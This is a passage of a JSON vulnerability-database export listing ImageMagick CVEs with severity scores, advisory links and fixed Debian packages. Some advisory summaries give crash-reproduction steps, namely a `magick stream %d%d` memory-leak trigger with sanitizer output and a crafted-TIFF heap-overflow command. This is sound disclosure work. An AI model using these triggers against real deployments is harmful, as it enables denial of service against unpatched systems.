"https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:48:25Z/" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/5facfecf1abb3fed46a08f614dcc43d1e548e20d", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:48:25Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/5facfecf1abb3fed46a08f614dcc43d1e548e20d" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:48:25Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-r83h-crwp-3vm7", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:48:25Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-r83h-crwp-3vm7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40311", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40311" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134627", "reference_id": "1134627", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134627" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458051", "reference_id": "2458051", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458051" }, { "reference_url": "https://github.com/advisories/GHSA-r83h-crwp-3vm7", "reference_id": "GHSA-r83h-crwp-3vm7", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-r83h-crwp-3vm7" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026115?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" }, { "url": "http://public2.vulnerablecode.io/api/packages/1054646?format=api", "purl": "pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068084?format=api", "purl": "pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1" } ], "aliases": [ "CVE-2026-40311", "GHSA-r83h-crwp-3vm7" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6v1d-1wfr-vqd1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/29097?format=api", "vulnerability_id": "VCID-784p-34mz-vucz", "summary": "ImageMagick has a Memory Leak in magick stream\n## Summary\n\nIn ImageMagick's `magick stream` command, specifying multiple consecutive `%d` format specifiers in a filename template causes a memory leak.\n\n## Details\n\n- **Vulnerability Type:** Memory leak\n- **Affected Version:** ImageMagick 7.1.1-47 (as of commit 82572afc, June 2025)\n\n## Reproduction\n\n### Tested Environment\n\n- **Operating System:** Ubuntu 22.04 LTS\n- **Architecture:** x86_64\n- **Compiler:** gcc with AddressSanitizer (gcc version: 11.4.0)\n\n### Reproduction Steps\n\n```bash\n# Clone source\ngit clone --depth 1 --branch 7.1.1-47 https://github.com/ImageMagick/ImageMagick.git ImageMagick-7.1.1\ncd ImageMagick-7.1.1\n\n# Build with ASan\nCFLAGS=\"-g -O0 -fsanitize=address -fno-omit-frame-pointer\" CXXFLAGS=\"$CFLAGS\" LDFLAGS=\"-fsanitize=address\" ./configure --enable-maintainer-mode --enable-shared && make -j$(nproc) && make install\n\n# Trigger crash\n./utilities/magick stream %d%d a a\n```\n\n### Output\n```\n$ magick stream %d%d a a\nstream: no decode delegate for this image format `' @ error/constitute.c/ReadImage/746.\nstream: missing an image filename `a' @ error/stream.c/StreamImageCommand/755.\n\n=================================================================\n==114==ERROR: LeakSanitizer: detected memory leaks\n\nDirect leak of 152 byte(s) in 1 object(s) allocated from:\n #0 0x7fc4ebe58887 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145\n #1 0x7fc4eb563c5c in AcquireMagickMemory MagickCore/memory.c:559\n #2 0x7fc4eb563c82 in AcquireCriticalMemory MagickCore/memory.c:635\n #3 0x7fc4eb60c2be in AcquireQuantumInfo MagickCore/quantum.c:119\n #4 0x7fc4eb6b6621 in StreamImage MagickCore/stream.c:1335\n #5 0x7fc4eb09d889 in StreamImageCommand MagickWand/stream.c:292\n #6 0x7fc4eaf1295d in MagickCommandGenesis MagickWand/magick-cli.c:177\n #7 0x55a34f7c0a0c in MagickMain utilities/magick.c:153\n #8 0x55a34f7c0cba in main utilities/magick.c:184\n #9 0x7fc4ea38fd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58\n\nIndirect leak of 64 byte(s) in 1 object(s) allocated from:\n #0 0x7fc4ebe5957c in __interceptor_posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:226\n #1 0x7fc4eb680e2f in AcquireSemaphoreMemory MagickCore/semaphore.c:154\n #2 0x7fc4eb680f30 in AcquireSemaphoreInfo MagickCore/semaphore.c:200\n #3 0x7fc4eb60d38d in GetQuantumInfo MagickCore/quantum.c:435\n #4 0x7fc4eb60c30e in AcquireQuantumInfo MagickCore/quantum.c:121\n #5 0x7fc4eb6b6621 in StreamImage MagickCore/stream.c:1335\n #6 0x7fc4eb09d889 in StreamImageCommand MagickWand/stream.c:292\n #7 0x7fc4eaf1295d in MagickCommandGenesis MagickWand/magick-cli.c:177\n #8 0x55a34f7c0a0c in MagickMain utilities/magick.c:153\n #9 0x55a34f7c0cba in main utilities/magick.c:184\n #10 0x7fc4ea38fd8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58\n\nSUMMARY: AddressSanitizer: 216 byte(s) leaked in 2 allocation(s).\n```\n\n### Commits\nFixed in https://github.com/ImageMagick/ImageMagick/commit/fc3ab0812edef903bbb2473c0ee652ddfd04fe5c and https://github.com/ImageMagick/ImageMagick6/commit/d49460522669232159c2269fa64f73ed30555c1b", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-53019.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-53019.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53019", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24926", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24806", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24739", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00086", "scoring_system": "epss", "scoring_elements": "0.24966", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26484", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26541", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26587", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.2658", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26363", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26424", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.26463", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00096", "scoring_system": "epss", "scoring_elements": "0.2649", "published_at": "2026-04-16T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53019" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-53019", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-53019" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.7.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.7.0" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick6/commit/d49460522669232159c2269fa64f73ed30555c1b", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/d49460522669232159c2269fa64f73ed30555c1b" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/fc3ab0812edef903bbb2473c0ee652ddfd04fe5c", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/fc3ab0812edef903bbb2473c0ee652ddfd04fe5c" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-cfh4-9f7v-fhrc", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:27:49Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-cfh4-9f7v-fhrc" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53019", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53019" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1109339", "reference_id": "1109339", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1109339" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2379949", "reference_id": "2379949", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2379949" }, { "reference_url": "https://github.com/advisories/GHSA-cfh4-9f7v-fhrc", "reference_id": "GHSA-cfh4-9f7v-fhrc", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cfh4-9f7v-fhrc" }, { "reference_url": "https://usn.ubuntu.com/7728-1/", "reference_id": "USN-7728-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7728-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2025-53019", "GHSA-cfh4-9f7v-fhrc" ], "risk_score": 1.6, "exploitability": "0.5", "weighted_severity": "3.3", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-784p-34mz-vucz" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/351744?format=api", "vulnerability_id": "VCID-7gb9-gd78-7bdu", "summary": "ImageMagick: Magick.NET: ImageMagick: Denial of Service due to heap buffer overflow in MVG decoder", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33901.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33901.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33901", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00038", "scoring_system": "epss", "scoring_elements": "0.11197", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00041", "scoring_system": "epss", "scoring_elements": "0.12234", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00053", "scoring_system": "epss", "scoring_elements": "0.16594", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00053", "scoring_system": "epss", "scoring_elements": "0.16691", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33901" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33901", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33901" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T13:50:52Z/" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/4c72003e9e54a4ebaa938d239e75f5d285527ebe", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T13:50:52Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/4c72003e9e54a4ebaa938d239e75f5d285527ebe" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458023", "reference_id": "2458023", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458023" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33901", "reference_id": "CVE-2026-33901", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33901" }, { "reference_url": "https://github.com/advisories/GHSA-x9h5-r9v2-vcww", "reference_id": "GHSA-x9h5-r9v2-vcww", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-x9h5-r9v2-vcww" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-x9h5-r9v2-vcww", "reference_id": "GHSA-x9h5-r9v2-vcww", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-14T13:50:52Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-x9h5-r9v2-vcww" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" }, { "url": "http://public2.vulnerablecode.io/api/packages/1054646?format=api", "purl": "pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068084?format=api", "purl": "pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1" } ], "aliases": [ "CVE-2026-33901", "GHSA-x9h5-r9v2-vcww" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7gb9-gd78-7bdu" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/27661?format=api", "vulnerability_id": "VCID-7t1t-1spz-gfee", "summary": "ImageMagick has a heap-buffer-overflow\n### Summary\nWhile Processing a crafted TIFF file, imagemagick crashes.\n\n### Details\nFollowing is the imagemagick version:\n```\nimagemagick_git/build_26jun23/bin/magick --version\nVersion: ImageMagick 7.1.1-13 (Beta) Q16-HDRI x86_64 56f478940:20230625 https://imagemagick.org\nCopyright: (C) 1999 ImageMagick Studio LLC\nLicense: https://imagemagick.org/script/license.php\nFeatures: Cipher DPC HDRI \nDelegates (built-in): fontconfig freetype jbig jng jpeg lcms lzma pangocairo png tiff webp x xml zlib\nCompiler: gcc (4.2)\n```\n### PoC\nissue can be replicated with following command with provided POC file(sent over email):\n```bash\nmagick poc.tiff /dev/null\n```\n### Impact\nThis can lead to application crash.\n\n### Credits\nPlease give credits to Hardik shah of Vehere (Dawn Treaders team)", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-68469.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-68469.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68469", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.08064", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.08146", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.08071", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.08139", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.08113", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.07995", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.0801", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.08103", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.0812", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.08125", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.1229", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.0004", "scoring_system": "epss", "scoring_elements": "0.12273", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-68469" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68469", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68469" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3.1", "scoring_elements": 